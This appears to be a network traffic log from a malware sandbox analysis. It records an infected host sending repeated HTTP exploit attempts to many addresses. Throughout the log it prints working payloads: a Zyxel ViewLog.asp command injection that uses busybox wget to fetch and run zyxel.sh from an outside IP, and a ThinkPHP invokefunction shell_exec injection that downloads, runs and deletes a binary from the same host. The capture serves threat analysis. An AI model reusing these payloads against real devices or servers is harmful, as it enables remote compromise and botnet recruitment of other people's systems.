                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        668192.168.2.145431031.136.66.1788080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:28.259341955 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:28.965614080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:30.345690012 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:33.317568064 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:38.949307919 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:49.956782103 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:11.971971989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:57.026530981 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        669192.168.2.143617885.115.215.888080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:28.260886908 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:28.487281084 CET323INHTTP/1.0 404 Not Found
                                                        Date: Tue, 20 Jan 1970 18:52:40 GMT
                                                        Server: Caddy v0.11.1
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>404 Not Found</H1>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        670192.168.2.143914294.120.244.1018080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:28.287132025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        671192.168.2.143934894.123.51.908080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:28.287137032 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        672192.168.2.144212894.190.15.1808080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:28.288990974 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        673192.168.2.144661295.101.96.8980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:29.212044001 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:29.414426088 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:34:29 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:29 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 38 33 34 31 30 36 30 26 23 34 36 3b 31 37 30 37 38 39 39 36 36 39 26 23 34 36 3b 31 38 65 31 34 63 30 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;98341060&#46;1707899669&#46;18e14c0c</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        674192.168.2.143692295.100.251.17380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:29.219376087 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:29.429378986 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:34:29 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:29 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 37 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 37 38 39 39 36 36 39 26 23 34 36 3b 36 36 61 65 65 65 35 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;577e19b8&#46;1707899669&#46;66aeee58</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        675192.168.2.145989095.100.188.3780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:29.232950926 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:29.456334114 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:34:29 GMT
                                                        Date: Wed, 14 Feb 2024 08:34:29 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 35 64 31 66 35 35 37 26 23 34 36 3b 31 37 30 37 38 39 39 36 36 39 26 23 34 36 3b 32 65 38 63 65 39 39 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;b5d1f557&#46;1707899669&#46;2e8ce998</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        676192.168.2.144991485.122.205.628080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:29.270658016 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:30.345585108 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        677192.168.2.144004262.12.160.298080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:29.279567003 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        678192.168.2.145024294.140.81.1468080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:29.292026043 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        679192.168.2.145129862.29.82.1458080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:29.309386015 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        680192.168.2.144675294.122.235.768080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:29.311621904 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        681192.168.2.145266495.58.241.7180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:29.314343929 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:29.619311094 CET29INHTTP/1.1 200 OK
                                                        Feb 14, 2024 09:34:29.620203018 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        682192.168.2.143651894.182.176.2078080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:29.358921051 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        683192.168.2.145402888.208.248.13980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:29.411592960 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:29.610940933 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:29 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
